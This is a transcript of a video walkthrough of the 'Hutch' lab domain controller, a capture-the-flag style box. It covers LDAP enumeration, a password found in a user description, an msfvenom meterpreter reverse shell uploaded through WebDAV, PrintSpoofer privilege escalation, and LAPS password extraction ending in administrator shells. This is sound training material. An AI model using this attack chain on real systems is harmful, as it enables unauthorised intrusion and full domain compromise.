Let's go ahead and start off with a network scan. So let's do sudo nmap tac-sc for default scripts, tac-sv to enumerate the versions, tac-vv to get some verbose output, tac-pn to not use ICMP pings, and tac-on to output to a file, call it initial, with this IP address right here, and we can go ahead and send that through. Now I already did run this because it did take a little bit of time, so we can just go ahead and take a look at what we got here. Now, right off the bat, I see Kerberos, I see HTTP, which is port 80, I have LDAP here, and we do see that this is an Active Directory domain, and the domain name is hutch.offsec right here. We can also see, if we scroll down a little bit more, see if it shows us the fully qualified domain name, and here is the host, which is hutchdc, so it's going to be hutchdc.hutch.offsec. So let's go ahead and put that in our etc host file. So we could do sudo vi etc hosts and go ahead and throw this IP address in here with hutchdc.hutch.offsec and hutch.offsec like this. Fantastic, and we got that settled. So we do have LDAP, we do have SMB, we have RPC, and we have an IIS Windows server here. Although I do see that this does look odd because this has this Web-Dav type here and this Web-Dav scan that was run on the IIS server. And Web-Dav is basically, how I like to think of it, is sort of like a file server that's immediately or sort of directly accessible from a web application, right? Like anybody who has access to that website, has access to that web application, even from the browser, can upload and download files through Web-Dav, depending on whether there is credentials for authentication or not, right? So that's something interesting that we can go ahead and take a look at in a moment. Although let's go ahead and start off with the simple stuff. Let's do NXC, SMB, and then we could do tac-u with nothing, tac-p with nothing, and then go ahead and put hutch.offsec. That's not going to work. If I could spell it, that'd be fantastic. Boom, right there. And let's see, we do have null authentication apparently. So let's see if we can see the shares. And we cannot enumerate the shares. Let's see, can we go ahead and try guest authentication? And no, so that doesn't seem to work. We don't have actual access to the SMB server at the current moment. The next thing I'd like to go ahead and try is to see if there's any zone transfers. I normally check that whenever there's a TCP DNS connection or a TCP DNS port open. So let's go ahead and do dig, and then we can do AXFR with hutch.offsec at the IP address, and transfer failed, so there is no zone transfer available on here. Now another thing that we can go ahead and try and check out is LDAP. So let's do ldapsearch with tac-h for the URI. Then we could do ldap : hutch.offsec, and then we can do tac-x for simple authentication, tac-s to specify the scope, and then we can do base with naming contexts to get the naming context. We can grab this naming context of the domain, and then we can go ahead and set the base to this. Click enter, and it looks like we do have anonymous or guest access to LDAP, or to query the LDAP, right? Okay, off the bat, I can see this description right here is password set to this. Now this is pretty interesting. I'm going to go ahead and copy that, and we can come back to that in a moment. So let's do cd creds and vi creds, or I guess cred. We can go ahead and paste this in here and save that. Let's move cred to creds. There you go. Close that out, and we do have anonymous or guest access to query the LDAP server. So let's go ahead and get a list of users. Let's do another query, and let's go ahead and do object class equals user like this. We can go ahead and get all the users, and then we can grep for, I believe it's Sam account name. Yes, right here, Sam account name. It's going to give us a list of users, and then we can go ahead and awk on the second field, and that's going to give us all the usernames. So let's go ahead and output this to users.list. There we go. And another thing that I would like to do is output the entire LDAP query that we're able to get to temp, and we can cat temp, we can sort it, and then we can unique -c to get rid of any duplicates, and then we can sort it again by number, and we can get all the one-offs from the top. But we already did see that there was a interesting description, so we can grep for description, and we see all the descriptions here of all the users. Now, if we come down here to the second to last one, we see that this password is set to crab shark jellyfish 192 at the user's request. So let's go ahead and try a brute force on this to see which username aligns with this password. So let's do nxc smb hutch.offsec, and then tag u with users.list, and tag p with crab shark jellyfish 192. I believe that's how it is. Let's go ahead and send that through, and let's see if we get a hit here. Okay, so we do get a hit on fmcsorley, so we can go ahead and grab this credential. That's cat vi creds and creds, and then we can go ahead and delete this one and paste this one here. Awesome. So the first thing I want to go ahead and do is see what this guy has access to. So let's do another nxc smb with fmcsorley. Forgot to list the shares. Let's see what other shares this guy has access to. Okay, so all these look to be default shares. One thing that we can check is this sysvol share for any groups.xml or group policy passwords. So let's do get gpp password, and then we could do hutch.offsec /fmcsorley, and then the password 192, and then at the IP address. Nope, don't have it there. Let's grab it right here. Paste that there, and then we can do tag S for the share and sysvol. So that's going to go ahead and run. Now, while this is running, let's go ahead and take a look at that Web-Dav instance. So the first thing that I want to see how to do, right, is to be able to connect to the Web-Dav. We need a client, a Web-Dav client. So let's try Web-Dav client Linux, and let's see what we have here. Web-Dav client here, awesome Web-Dav. Let's see. We can see if there's any recommendations here. No, this just looks like a problem that a user was having. Let's try this GitHub script here. Awesome Web-Dav. Now, is this an actual client or is this a server? Okay, servers, Docker image. Okay, so I don't think, hold on, I thought I saw something here. Okay, that's C++, that's fine. There is a Web-Dav client called Cadaver. I believe I mentioned it in another video. Let's see, Web-Dav Cadaver. Here we go. using Cadaver as a Web-Dav client. And here it is right here. So we can do sudo apt get or sudo apt install Cadaver. And it's okay. I believe it's already installed. Let me see. Yeah. All right, cool. So we already have it here. Now let's go ahead and see if we can connect to this Web-Dav instance. So let's do Cadaver, and we could do a help to see the options. So all we need is the actual IP address and the path, if there is path, and it defaults to / and it's on port 80. So we're already on port 80. The IIS server is already on port 80. And if we look at it, I don't believe that there's any other sort of directories other than / right? Other than the main one right here. So let's go ahead and do Cadaver with this IP address. Now this didn't find anything up here, so we can go ahead and close that, give us a little bit more room. And now it's asking for authentication. So let's go ahead and try the creds that we just found. So let's do cat creds. We can do fmcsorley and this credential right here, or this password right here. Paste it here. And we have access to the Web-Dav server. So if we do help, we can see the list of commands that we have here. We can do rm to delete stuff, make directories, we can move stuff, copy stuff, more to look into files, and then we can also quit, and we have all these other available commands. So you can see that this is like a put, get, mget. This reminds me a little bit of like an FTP server, right? Or a SMB server, right? So let's go ahead and upload a file here. If you're thinking what I'm thinking that since this is a Windows instance, we can go ahead and create a malicious aspx executable and then try and hit it from this web page right here. So let's go ahead and try that out to see if we can get a shell on the box. Let's do msfvenom, tac p, and then we can do Windows x64, meterpreter, and then shell, or is it reverse TCP? Yeah, lhost equals 192, lport equals 9999, and then tac f is going to be aspx, and tac o is going to be reverse.aspx, like this. Go ahead and output that. Fantastic. And let's see. We can just go ahead. Are we in the same directory? All right. So we can go ahead and do put for. So we can do put reverse.aspx, upload that there. Let's go ahead and do sudo msf console to go ahead and get a shell there. And what we can do from here is let's go ahead and check if this uploaded. Uh-oh, weird. fmcsorley and crab shark jellyfish 192 ls. Okay, nothing there. Let's do it again. Let's do put reverse.aspx. There you go, ls, and we have it right here. Fantastic. So let's do use exploit multi-handler. Let's set payload to Windows x64 meterpreter and reverse TCP. Set lhost to ton0 and set lport to 9999 and run this. It's going to go ahead and start it up. And we can go ahead and hit reverse.aspx aspx, send it through, we see it hanging, and we get a stage right here, and we have a shell in the box. Awesome. So what we can do from here, right, is let's do shell. Let's see, who am I? And we are the IIS apppool user. And if you know anything about this user, we can do who am I / priv, and we can see that we have the SeImpersonatePrivilege that allows us to impersonate another user or a delegate token on the box. So one thing that we can do is we can actually use this Web-Dav client to upload the PrintSpoofer privilege escalation tool that allows us to utilize that impersonate privilege to gain sort of administrator access on the box, right? So let's go ahead and not do that. Let's go ahead and do PrintSpoofer exe GitHub. Goodness. There we go. We have this one right here. We can go to the first release right here, grab the 64 version, have it right here, fantastic. And let's go ahead and do put on downloads, PrintSpoofer.exe, like this. It's going to go ahead and upload it, and it could not find it. Maybe we have to be in that directory. Let's see. Could not open file, no such file or directory. Odd. Yeah, maybe we have to be inside that directory. So let's close this. Let's move downloads PrintSpoofer.exe here. Let's go ahead and connect to this again. There we go. Let's put PrintSpoofer.exe. There we go. We have it in there. If we do ls, we can see that it's there. Fantastic. And let's go ahead and do a /, or are we in that directory right now? No, we're not. So we got to go to the main directory or the root drive. Let's go to cd inet pub and then root, which is the root of the web application. And we can see that right here we have this PrintSpoofer.exe. Let's go ahead and do a / PrintSpoofer.exe, and then we can do -i for interactive and -c for the command, and we can go ahead and do a cmd.exe. And who am I? We are Hutch DC, which is the machine account, and we have all privileges. If we do who am I / priv, we have all privileges. We can literally do anything on the box. This is practically administrator. Although this is not the end of the box. There is another way, another form of privilege escalation, or another form of gaining administrator access to the box. This was just one method, right? Now, another method would be to check if our current user has the privilege to read the lapse password or the machine account password set by the local administrator. Now, how do we do this? The first way that we can do this is through NXC, right? Or through crackmap.exec. So let's go ahead and close out of this. Let's go down here a bit. We'll save that for a moment. And we can do NXC and LDAP because this is part of LDAP. It queries the LDAP server. And we can do TAC-U, fmcsorley, and TAC-P with crab, shark, jellyfish, 192. And then we can use the module of lapse. Oh, we do need a target. We do need Hutch OffSec. And we can see that we get the computer password right here. So this is the computer password of this Hutch DC computer. And this password in particular allows for administrator access to the box. Even if we use this on psexec, so we could do psexec.py hutch.offsec /administrator with no password and the IP address 192.168.167 and 122. Enter this password. We find a writable share, and who am I? We are anti-authority system on the box. Fantastic. That's just another way to find it. This is probably the easiest way to find it, right? Now, another way would be to query the registry. One way that we can do this is by going to laps and hacktricks. Go ahead and go to the first one. And we can go ahead and query the registry manually to see if the admin password is enabled or to see if laps is enabled. Let's go ahead and come back here. We'll query this, and we can see that we have a 0x1 as a response here. Now, a 0x1 means 1 or true. That means that this is actually enabled. Another thing that we can do is we can list the directory of c:/program files, and then laps, and then CSE to see if there is this admpwd.dll, which there is, meaning that laps is enabled. So let's go ahead and extract this laps password from LDAP, right? So if we do it through here, considering that fmcsorley could actually view the password, we can do a LDAP search on this LDAP server, hutch.offsec, and supply the credentials of fmcsorley and grab shark jellyfish 192, and then we can go ahead and do the base of dc equals hutch and dc equals offsec like this. Let's see. Am I missing something here? Oh, this is not P. This is actually W. There we go. So it queries the entire thing here. And what we can do from here is we can do grep for, I believe it's MCS, and then ADM PWD. No, probably not. Let's see. Okay, so that works. Let's grep hutch DC. Authentication started. Can we not? All right, let's just output this to a file. We'll call it LDAP. Okay, cat LDAP. There we go. And let's cat LDAP and grep hutch DC $. Nothing in there. Odd. Let's do ADM PWD. This is weird. Let's see. We authenticated as him. We should be able to, is it capital? ADM PWD. Yeah, there it is. So it is capital apparently. We can do, I guess this is case sensitive, B4 and A4. And we can see that the machine password or the ADM password is this right here for the Hutch DC. And if we went ahead and grabbed this and we did a psexec.py with hutch.offsec/administrator, no password, and the IP address. Go ahead and paste this in. We can go ahead and get a shell as administrator as well. And now one last thing that you can do to find this is, let's say you didn't have access to that, right? And we had access to a shell on here. You can do it also with powerview. And so if we go ahead and locate powerview.ps1, okay, we can grab this here. We can copy powerview here. And then we can do cadaver on this, fmcsorley. And then put powerview.ps1 ls. We can see that it's here. And then we can scroll up on this a little bit more so we can get a good image. Let's change the directory to c:/inetpub www.root. We can see it right here. Let's do PowerShell, go into a PowerShell shell, and then we can do an import module on this. Actually, let's do a / this. Fantastic. And we can do Get-DomainObject -identity. Did I spell that right? Identity, like that. Yeah. Hutch DC $, and then properties, and it's going to be MC-MCS and then -ADM PWD. Okay, I guess that didn't work for some reason. Let's see, can we do just the properties here? Okay. Oh, right here. We have this MS-MCS ADM PWD, which is the same machine account password, and it would help if we spelled it correctly. Let's try this again. And then we could do properties and then MS-MCS ADM PWD, and there it is. So that's just another way to go ahead and find this. So there was a bunch of different methods on finding one single piece of information, which is incredibly cool to me, at least in my opinion, right? Knowing how to find a certain piece of information in a bunch of different ways, just in case one of them doesn't work, is always important, especially in this line of work. So I hope you guys enjoyed the video. This is the entire box. I didn't show any of the flags or anything, but for me, that's not so much important. It's more of like understanding the concepts that we used to extract these passwords or to do the escalation that we did, right? And so a couple other things that we can do is we can do a cleanup. So we can, let's go back to this Web-Dav instance up here. Oops, not that, up here, there you go. And then we can remove reverse, remove power view, and remove PrintSpooler or spoofer. If we do ls, oh, forbidden. Is it because of this? Let's try this again. Let's exit this. Oh, it's because it's currently running. In the case that you could actually stop the service from running, we could just go ahead and delete this PrintSpoofer off of the machine. You always want to try and keep the environment the same as you found it. Don't add any other backdoors that someone else could use to attack it. And so just go from there, right? So I hope you guys enjoyed the video, and I will see you guys in the next one.